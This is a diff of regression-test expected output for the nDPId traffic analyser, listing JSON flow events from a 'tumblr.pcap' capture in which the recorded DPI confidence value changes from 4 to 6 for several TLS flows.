00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -240,16 +240,16 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -258,13 +258,13 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} 